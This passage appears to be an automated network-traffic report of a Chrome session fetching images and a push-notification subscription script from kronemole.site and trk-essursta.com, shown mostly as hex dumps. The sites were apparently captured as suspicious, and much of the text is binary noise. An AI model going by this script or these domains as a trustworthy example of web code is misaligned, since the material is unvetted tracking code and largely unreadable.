                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VmzAS6XsmqYLCFfd%2BCcodMRk73UEMvNQzkegpbXw%2BaMkGZTYapuYR1O2dvIjUfrDfuu8BIgEFDXvh9U%2FyEFs0jDanC2Q%2BktzdXg879dMWYC0BwMUCv4Qp5B6xHilBbmgoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa2d9bb389a-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:43 UTC680INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 1f 43 6f 6d 70 72 65 73 73 65 64 20 62 79 20 6a 70 65 67 2d 72 65 63 6f 6d 70 72 65 73 73 ff db 00 84 00 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c 01 04 04 04 04 04 04 04 04 04 04 06 06 05 06 06 08 07 07 07 07 08 0c 09 09 09 09 09 0c 13 0c 0e 0c 0c 0e 0c 13 11 14 10 0f 10 14 11 1e 17 15 15 17 1e 22 1d 1b 1d 22 2a 25 25 2a 34 32 34 44 44 5c ff c2 00 11 08 00 32 00 32 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 02 02 03 01 00 00 00 00 00 00 00 00 00 00 04 07 06 08 03 05 00 01 09 02 ff da 00 08 01 01 00 00 00 00 7f b0 7c cc e0 d7 de 18
                                                                          Data Ascii: JFIFCompressed by jpeg-recompress""*%%*424DD\""*%%*424DD\22"|
                                                                          2023-11-21 16:58:43 UTC681INData Raw: fb 4c 37 2a 3f 4d 3a b1 94 03 2d 83 86 ef 24 a4 14 23 68 e1 4d 44 0e 3f 98 6a 62 3b 41 52 1b b7 17 ab 11 39 a5 08 2c af 18 8b 41 69 20 f9 40 e6 2b 46 7e 1d aa 62 7e bb 7c df 25 30 a7 b4 4c d2 46 75 a4 9b 30 e2 55 db ca f4 fc 31 9f 20 da 4c ca c7 bc 8a 06 b1 e2 f1 84 a3 84 1c 0a 7d eb be 40 40 86 ab 2a 5d 20 57 d6 da 60 15 97 5b 98 b1 53 1f 0f b1 50 5a f0 02 20 f9 71 32 d1 8a 2b 33 37 37 97 91 34 43 ad 2b 3a b1 ec 65 a6 5c 4e 42 7d 67 ec dc 23 ac c5 66 a8 39 5e d0 a2 49 2e 35 15 4f e2 5c 30 c9 20 5a 59 43 7e ad a0 6b a8 8a 66 17 85 e8 5f b0 b6 e2 3b 30 a1 14 c5 9b 65 9e 3c 55 23 0d 6e 64 d1 d2 0b 4f 6d c3 76 14 cf 53 82 66 28 48 32 d2 a1 56 81 c5 63 e3 6f e5 8f 6a 26 d7 2c 65 76 6c a1 e7 9c 37 92 8e 71 a4 d1 a3 b5 2f 74 ab 47 e9 51 35 84 07 cd bf 11 92 b3
                                                                          Data Ascii: L7*?M:-$#hMD?jb;AR9,Ai @+F~b~|%0LFu0U1 L}@@*] W`[SPZ q2+3774C+:e\NB}g#f9^I.5O\0 ZYC~kf_;0e<U#ndOmvSf(H2Vcoj&,evl7q/tGQ5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.449763104.21.72.34435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:42 UTC670OUTGET /scripts/push/v9e118mez8 HTTP/1.1
                                                                          Host: trk-essursta.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://kronemole.site/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-11-21 16:58:43 UTC671INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: application/javascript;charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          expires: 0
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          x-xss-protection: 1; mode=block
                                                                          pragma: no-cache
                                                                          x-frame-options: SAMEORIGIN
                                                                          referrer-policy: strict-origin-when-cross-origin
                                                                          content-security-policy: default-src 'self'; frame-src 'self' data:; connect-src 'self' https://cdn-media-2020.s3.amazonaws.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://storage.googleapis.com; style-src 'self' 'unsafe-inline'; img-src * 'self' https://* blob: data:; font-src 'self' data:
                                                                          vary: Origin
                                                                          vary: Access-Control-Request-Method
                                                                          vary: Access-Control-Request-Headers
                                                                          x-content-type-options: nosniff
                                                                          permissions-policy: camera=(), fullscreen=(self), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), sync-xhr=()
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IT%2BsQYbaZDDLrVsZEYSql96z3mwwLtDpxcUD7LTZ0aRD8wSlRDHefzSfrO%2Bap7FV%2FZHEd77322Ng34Xe2gqElKOCBaG5mMk63zTIrrc5u4k12tJtbqVJJR3yFurxotUZmU%2Bx"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa2dc819c25-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:43 UTC672INData Raw: 31 63 62 34
                                                                          Data Ascii: 1cb4
                                                                          2023-11-21 16:58:43 UTC672INData Raw: 0d 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 63 6f 6e 73 74 20 73 6d 50 75 73 68 41 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 50 75 62 6c 69 63 4b 65 79 3d 22 42 4a 62 75 6a 74 4b 49 6d 6b 69 4c 57 6a 6c 57 6b 4d 47 59 4d 6f 32 5f 73 4d 30 61 6c 32 34 4b 6f 53 37 55 36 54 4a 31 55 37 73 4b 4a 61 78 6c 49 55 4c 7a 35 73 36 70 37 74 4e 36 57 62 6e 4c 69 73 43 71 5f 53 69 35 68 50 37 58 30 37 36 39 54 76 50 44 46 54 51 3d 22 2c 73 6d 50 75 73 68 53 69 74 65 49 64 3d 22 76 39 65 31 31 38 6d 65 7a 38 22 2c 73 6d 43 6c 69 65 6e 74 49 64 3d 22 71 32 67 6f 79 6b 6a 64 72 76 22 2c 73 65 72 76 69 63 65 57 6f 72 6b 65 72 3d 22 2f 73 65 72 76 69 63 65 2d 77 6f 72 6b 65 72 2e 6a 73 22 3b 6c 65 74 20 73 6d 50 75 73 68 44 6f 6d 61 69 6e 3d 22 70 75 73 68 2e 74 72
                                                                          Data Ascii: "use strict";const smPushApplicationServerPublicKey="BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=",smPushSiteId="v9e118mez8",smClientId="q2goykjdrv",serviceWorker="/service-worker.js";let smPushDomain="push.tr
                                                                          2023-11-21 16:58:43 UTC674INData Raw: 74 77 6f 2c 72 2e 73 6f 75 72 63 65 5f 74 77 6f 29 2c 65 2e 73 6f 75 72 63 65 54 68 72 65 65 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 74 68 72 65 65 2c 72 2e 73 6f 75 72 63 65 5f 74 68 72 65 65 29 2c 65 2e 73 6f 75 72 63 65 46 6f 75 72 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 66 6f 75 72 2c 72 2e 73 6f 75 72 63 65 5f 66 6f 75 72 29 2c 65 2e 73 6f 75 72 63 65 46 69 76 65 3d 73 65 74 49 66 4e 75 6c 6c 28 75 74 6d 4f 62 6a 2e 73 6f 75 72 63 65 5f 66 69 76 65 2c 72 2e 73 6f 75 72 63 65 5f 66 69 76 65 29 2c 65 2e 73 6f 75 72 63 65 4f 6e 65 3d 73 65 74 49 66 4e 75 6c 6c 28 65 2e 73 6f 75 72 63 65 4f 6e 65 2c 72 2e 73 31 29 2c 65 2e 73 6f 75 72 63 65 54 77 6f 3d 73 65 74 49 66 4e 75 6c 6c 28 65
                                                                          Data Ascii: two,r.source_two),e.sourceThree=setIfNull(utmObj.source_three,r.source_three),e.sourceFour=setIfNull(utmObj.source_four,r.source_four),e.sourceFive=setIfNull(utmObj.source_five,r.source_five),e.sourceOne=setIfNull(e.sourceOne,r.s1),e.sourceTwo=setIfNull(e
                                                                          2023-11-21 16:58:43 UTC675INData Raw: 6d 69 73 73 69 6f 6e 20 64 65 6e 69 65 64 22 3d 3d 3d 65 2e 6d 65 73 73 61 67 65 3f 22 64 65 66 61 75 6c 74 22 3d 3d 3d 4e 6f 74 69 66 69 63 61 74 69 6f 6e 2e 70 65 72 6d 69 73 73 69 6f 6e 3f 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 63 6c 6f 73 65 64 5f 70 72 6f 6d 70 74 22 2c 65 2e 74 6f 53 74 72 69 6e 67 28 29 2c 76 65 72 73 69 6f 6e 29 3a 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 62 6c 6f 63 6b 65 64 22 2c 65 2e 74 6f 53 74 72 69 6e 67 28 29 2c 76 65 72 73 69 6f 6e 29 3a 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 6f 74 68 65 72 5f 65 72 72 6f 72 22 2c 65 2e 74 6f 53 74 72 69 6e 67 28 29 2c 76 65 72 73 69 6f 6e 29 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 72 3d 65 2e 74 6f 4a 53 4f 4e 28 29 2c 65 3d
                                                                          Data Ascii: mission denied"===e.message?"default"===Notification.permission?logPushEvent("closed_prompt",e.toString(),version):logPushEvent("blocked",e.toString(),version):logPushEvent("other_error",e.toString(),version)})}).then(function(e){if(e){var r=e.toJSON(),e=
                                                                          2023-11-21 16:58:43 UTC676INData Raw: 6e 53 65 72 76 65 72 50 75 62 6c 69 63 4b 65 79 29 3b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 4d 61 6e 61 67 65 72 2e 73 75 62 73 63 72 69 62 65 28 7b 75 73 65 72 56 69 73 69 62 6c 65 4f 6e 6c 79 3a 21 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 53 65 72 76 65 72 4b 65 79 3a 65 7d 29 7d 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 53 65 72 76 69 63 65 20 57 6f 72 6b 65 72 20 45 72 72 6f 72 22 2c 65 29 2c 70 75 73 68 4c 6f 67 67 69 6e 67 26 26 22 52 65 67 69 73 74 72 61 74 69 6f 6e 20 66 61 69 6c 65 64 20 2d 20 70 65 72 6d 69 73 73 69 6f 6e 20 64 65 6e 69 65 64 22 3d 3d 3d 65 2e 6d 65 73 73 61 67 65 3f 6c 6f 67 50 75 73 68 45 76 65 6e 74 28 22 62 6c 6f 63 6b 65 64 22 2c 65 2e 74 6f 53 74 72 69 6e 67
                                                                          Data Ascii: nServerPublicKey);return r.pushManager.subscribe({userVisibleOnly:!0,applicationServerKey:e})}}).catch(function(e){console.error("Service Worker Error",e),pushLogging&&"Registration failed - permission denied"===e.message?logPushEvent("blocked",e.toString
                                                                          2023-11-21 16:58:43 UTC678INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 4c 6f 67 20 45 72 72 6f 72 2c 20 65 72 72 6f 72 20 22 2c 65 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 70 75 73 68 5f 75 6e 73 75 62 73 63 72 69 62 65 28 29 7b 6e 61 76 69 67 61 74 6f 72 2e 73 65 72 76 69 63 65 57 6f 72 6b 65 72 2e 72 65 61 64 79 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 4d 61 6e 61 67 65 72 2e 67 65 74 53 75 62 73 63 72 69 70 74 69 6f 6e 28 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 72 2e 75 6e 73 75 62 73 63 72 69 62 65 28 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 55 6e 73 75 62 73 63 72 69 62 65 64 22 2c 72 2e 65 6e
                                                                          Data Ascii: (function(e){console.error("Log Error, error ",e)})}function push_unsubscribe(){navigator.serviceWorker.ready.then(function(e){return e.pushManager.getSubscription()}).then(function(r){return r.unsubscribe().then(function(){console.log("Unsubscribed",r.en
                                                                          2023-11-21 16:58:43 UTC679INData Raw: 72 6e 20 65 2e 73 75 62 73 74 72 69 6e 67 28 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 2c 65 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 22 2e 22 29 2d 31 29 2b 31 29 7d 66 75 6e 63 74 69 6f 6e 20 67 65 74 53 74 6f 72 65 28 6e 29 7b 69 66 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 29 7b 6c 65 74 20 74 3d 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 2e 6f 70 65 6e 28 22 70 75 73 68 50 6c 61 74 46 6f 72 6d 44 62 22 2c 32 29 3b 74 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 65 72 72 6f 72 20 64 62 22 2b 74 2e 65 72 72 6f 72 29 2c 6e 28 6e 75 6c 6c 29 7d 2c 74 2e 6f 6e 73 75 63 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 72 3d 74 2e 72 65 73 75 6c 74 2c 6f 3d 72 2e 74 72 61 6e 73
                                                                          Data Ascii: rn e.substring(e.lastIndexOf(".",e.lastIndexOf(".")-1)+1)}function getStore(n){if(self.indexedDB){let t=self.indexedDB.open("pushPlatFormDb",2);t.onerror=function(e){console.log("error db"+t.error),n(null)},t.onsuccess=function(e){let r=t.result,o=r.trans
                                                                          2023-11-21 16:58:43 UTC680INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          23192.168.2.449764172.67.139.604435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:42 UTC671OUTGET /uploads/archive/company/1080/images/INES-wt.png HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:43 UTC682INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:43 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 26027
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:43 GMT
                                                                          last-modified: Tue, 14 Nov 2023 14:49:39 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent,User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vpWlMquBQ8hnSiNLEfgBlBoXHCL8HiybT75maq%2FBqc8RViyH2lCxeKk9whPGME1mDRRmcQt2PTnaSIgEvDApvm1IrgSjBCP3JFotkewrLpw94g6Xfot7L%2F42S92ErI2DUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aa2dc9b3b44-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:43 UTC683INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 01 ab 08 06 00 00 00 d0 08 6e 30 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 f1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 38 38 2c 20 32 30 32 30 2f 30 37 2f 31 30 2d 32 32 3a 30 36 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                          Data Ascii: PNGIHDRn0pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RD
                                                                          2023-11-21 16:58:43 UTC684INData Raw: 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 45 76 65 6e 74 23 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 30 20 28 57 69 6e 64 6f 77 73 29 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 32 33 2d 31 31 2d 31 34 54 32 30 3a 32 30 3a 33 30 2b 30 35 3a 33 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 33 2d 31 31 2d 31 34 54 32 30 3a 32 33 3a 34 39 2b 30 35 3a 33 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 33 2d 31 31 2d 31 34 54 32 30 3a 32 33 3a 34 39 2b 30 35 3a 33 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70
                                                                          Data Ascii: /ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Windows)" xmp:CreateDate="2023-11-14T20:20:30+05:30" xmp:ModifyDate="2023-11-14T20:23:49+05:30" xmp:MetadataDate="2023-11-14T20:23:49+05:30" dc:format="image/png" photoshop
                                                                          2023-11-21 16:58:43 UTC685INData Raw: b6 f4 4a 92 bb 10 4a 92 24 49 92 54 7c bd 89 65 7d f7 92 5e 78 45 fd 58 57 11 fd b4 16 73 18 94 14 67 60 49 92 24 49 92 54 6c 73 03 97 02 cb 65 7c 1e 63 81 13 81 c3 80 6f 1c 16 35 93 01 96 24 49 92 24 49 c5 35 14 38 17 98 31 47 e7 f4 2c b0 2d f0 a8 c3 a3 66 71 09 a1 24 49 92 24 49 c5 33 0d 70 21 d1 7b 6a c6 9c 9d db c2 c0 70 a2 c9 fb d4 0e 95 9a c1 19 58 92 24 49 92 24 15 4b 7f e0 3a e0 7f 0b 70 ae 2f 01 5b 13 81 96 d4 65 ce c0 92 24 49 92 24 a9 38 d6 02 1e a7 18 e1 15 c0 7c c0 03 c0 b1 c0 14 0e 9f ba ca 19 58 92 24 49 92 24 15 e0 fd 3b b0 1f 70 34 c5 9d 8c f2 28 b0 19 f0 b2 c3 a9 4e 3f 01 0c b0 24 49 92 24 49 ca b5 e9 88 7e 57 eb 97 e0 5a 3e 03 76 21 76 4d 94 1a 66 80 25 49 92 24 49 52 7e 2d 40 f4 bb 5a b0 64 d7 75 35 f0 5b 60 94 43 ac 46 18 60 49 92 24
                                                                          Data Ascii: JJ$IT|e}^xEXWsg`I$ITlse|co5$I$I581G,-fq$I$I3p!{jpX$I$K:p/[e$I$8|X$I$;p4(N?$I$I~WZ>v!vMf%I$IR~-@Zdu5[`CF`I$
                                                                          2023-11-21 16:58:43 UTC686INData Raw: 03 77 fa f4 c8 c9 93 d4 00 4b 92 24 49 92 54 61 bd 80 73 81 6d 33 3c 87 1a f0 3c b0 6f 89 ea da 97 08 05 67 a7 b8 b3 b1 c6 00 bf 26 66 c5 29 63 3d 2d 81 24 49 92 24 a9 a2 fa 00 57 90 7d 78 75 17 e5 0a af 20 76 4d dc 01 f8 47 fd 1a 8b 7c 7f fc c6 a7 4a f6 9c 81 25 49 92 24 49 aa a2 69 80 6b 89 86 dd 59 a9 01 a7 53 fe 65 6a 6b 13 61 d6 e0 82 9e ff 04 60 7f e0 78 9f 36 d9 e9 6d 09 24 49 92 24 49 15 d3 17 b8 11 58 39 c3 73 b8 86 e8 13 f5 62 05 ea 7d 2b b1 44 72 74 bd f6 45 5b 52 d8 03 f8 23 30 33 d1 60 df 99 40 59 0c 82 33 b0 24 49 92 24 49 15 32 23 70 1b b0 4c 46 c7 af 01 a3 80 3d 80 8f 2b 58 ff 53 81 fe 14 b7 2f d6 d9 c0 2e c0 78 9f 4a e9 32 c0 92 24 49 92 24 55 45 3f 62 b9 de a2 19 1d bf 06 bc 4e 04 20 55 f6 3b 60 25 8a 1b 62 5d 0f 6c 0a 7c e3 53 2a 3d 06
                                                                          Data Ascii: wK$ITasm3<<og&f)c=-$I$W}xu vMG|J%I$IikYSejka`x6m$I$IX9sb}+DrtE[R#03`@Y3$I$I2#pLF=+XS/.xJ2$I$UE?bN U;`%b]l|S*=
                                                                          2023-11-21 16:58:43 UTC688INData Raw: 24 7a 4f f5 cd e0 d8 57 00 3b 01 a3 1c 86 4a 3b 0f 98 95 e2 84 58 5f 02 6b 01 0f 56 75 c0 7a 7a cf 4a 92 24 49 92 52 b4 26 b1 1c 2a 8b f0 ea af c0 f6 18 5e 09 b6 03 de 24 82 d4 22 98 16 b8 19 f8 59 55 07 cc 19 58 92 24 49 92 a4 b4 ac 0d 5c 0b 4c 95 f2 71 6b c0 87 c0 0e 44 4f 21 a9 d5 59 c0 1c 14 67 26 d6 28 60 15 60 44 d5 06 ca 19 58 92 24 49 92 a4 34 ac 0b 5c 47 36 e1 d5 db c0 36 18 5e e9 87 76 02 46 52 9c 99 58 33 00 b7 03 0b 57 6d a0 0c b0 24 49 92 24 49 49 db 98 08 af a6 4c f9 b8 35 e0 15 62 e6 95 d4 9e bd 88 dd 28 8b 12 62 fd 18 b8 17 58 b0 4a 83 64 80 25 49 92 24 49 4a d2 56 c0 65 c4 ee 6f 69 aa 01 cf 11 bb 0d 4a 1d d9 1b 78 86 e2 84 58 b3 02 77 02 3f ad ca 00 19 60 49 92 24 49 92 92 b2 3d 70 3e d0 2b e5 e3 d6 88 1e 41 fb 3b 04 ea 84 03 81 a7 28 4e
                                                                          Data Ascii: $zOW;J;X_kVuzzJ$IR&*^$"YUX$I\LqkDO!Yg&(``DX$I4\G66^vFRX3Wm$I$IIL5b(bXJd%I$IJVeoiJxXw?`I$I=p>+A;(N
                                                                          2023-11-21 16:58:43 UTC689INData Raw: 4d 20 56 d2 5d 91 e5 49 24 15 60 cd 56 ff a1 f8 1b 62 17 c1 22 f9 16 f8 0b b1 85 ec 47 3e 9f 24 49 92 24 95 c4 3e 64 33 8b e2 52 62 35 ce 18 87 40 fa 81 6d 81 f5 c8 7f 88 f5 15 b0 32 f0 70 56 27 d0 ec 00 ab 07 91 1e 9e 04 cc 5c f0 9b e8 7d 62 3a df 0d 3e 9f 24 49 92 24 15 dc ef 88 dd cf d2 66 78 25 35 f6 fc 5c 89 fc 87 58 ef 02 3f 07 5e cb e2 e0 cd dc f5 6f 21 e0 21 e0 22 8a 1f 5e 01 cc 0a 5c 0f 5c 40 76 cd e6 25 49 92 24 a9 19 6f 8e 0d af a4 fc 3a 09 18 01 d4 72 7e 9e fd ea e7 38 7d 16 07 6f d6 0c ac 2d 81 33 81 69 4b 7a 33 3d 45 ec 9e f8 9a cf 2b 49 92 24 49 05 b2 1b 70 2a b1 5a 26 4d 86 57 52 e7 1d 47 4c 0e ca fb 4c ac 3b 80 75 80 71 69 1e b4 bb 33 b0 fa 02 97 10 b3 ae a6 2d f1 4d b4 18 b1 ce f3 e7 3e 9f 24 49 92 24 15 c4 76 64 13 5e 5d 0c 6c 83 e1 95
                                                                          Data Ascii: M V]I$`Vb"G>$I$>d3Rb5@m2pV'\}b:>$I$fx%5\X?^o!!"^\\@v%I$o:r~8}o-3iKz3=E+I$Ip*Z&MWRGLL;uqi3-M>$I$vd^]l
                                                                          2023-11-21 16:58:43 UTC690INData Raw: 96 ad cf 6c 49 da 35 33 b0 5e fd 0b 22 e4 bb 13 b8 01 f8 1b 36 88 57 f9 cc 0f dc 91 c1 cf 85 6b 80 5d 30 bc 92 8a 62 37 62 79 71 9e 77 26 3c 8b 98 4d fd 6a 77 5e 30 b5 65 15 c7 bf 5b 66 af ff 63 a3 72 99 11 38 b2 e2 35 30 c0 92 a4 e6 f9 29 70 34 b1 3b df fd c4 4c 5f c3 ab ce e9 5f af db ed 44 0f ad 4b 81 0d 80 69 2c 8d 4a 60 20 11 cc f6 4b f9 b8 d7 01 7b 91 ff 19 1d 92 be 33 9a 98 70 51 cb f1 39 ce 00 5c 49 cc 36 ef 92 b6 02 ac e9 80 a5 1c ff 6e 33 04 2c a7 ed 89 06 9a 55 65 80 25 49 dd d3 9b 98 3d 74 3b 30 12 38 10 98 c3 b2 34 ed 85 f1 af 89 99 23 ef 02 17 01 ab 01 bd 2c 8d 0a 68 3e e0 3e e0 27 29 1f f7 06 22 bc 7a d3 21 90 0a e7 19 62 d7 bf 3c 87 58 4b 03 87 74 f5 2f b7 15 60 fd 8c 6e 24 62 fa af 65 2d 41 29 f5 04 4e a1 ba 41 8e 01 96 24 75 4d 5f 60 77
                                                                          Data Ascii: lI53^"6Wk]0b7byqw&<Mjw^0e[fcr850)p4;L__DKi,J` K{3pQ9\I6n3,Ue%I=t;084#,h>>')"z!b<XKt/`n$be-A)NA$uM_`w
                                                                          2023-11-21 16:58:43 UTC692INData Raw: 1a 58 a6 bd ff d9 56 80 f5 ae cf 9b a6 79 cf 12 54 4a 0f e0 4f 94 bb b7 9c 01 96 a4 aa fd 5c 3f 01 f8 2b 2e 19 d4 0f 7d 45 2c 27 95 1a b1 3f f0 fb 94 8f 59 23 76 1e ab 59 fe cc 0c 02 5a 80 cb 80 c5 2d 47 87 1e 4b 61 3c 06 36 e1 71 66 48 f8 3c 1f 49 f8 f1 1f 06 fe 91 d3 9f 0d 3d 81 63 27 f7 3f 27 35 d2 e7 4d 53 7c 09 bc 65 19 2a 67 49 22 35 2e f3 9b 39 49 aa 82 5e c0 5f 80 bd 2d 85 da 71 05 f0 89 65 50 03 76 99 dc 1b b2 84 d4 88 1d f2 fe 6a f9 73 61 05 62 19 e7 22 96 62 b2 8a d0 07 2b 8d d9 74 23 52 38 c6 d1 e4 77 c5 d8 2f 89 dd 52 7f a0 ad 00 eb 25 9f 37 4d 31 12 77 21 ac aa 63 48 3e 95 cf 8a 01 96 a4 2a e8 43 84 13 db 5a 0a 4d c6 d9 96 40 0d d8 0a 38 2d e5 63 d6 88 dd f0 ce b7 fc b9 b2 02 70 3a 30 8b a5 68 d7 2b 24 b7 74 ae d5 80 26 fc fd 24 77 20 4c b2
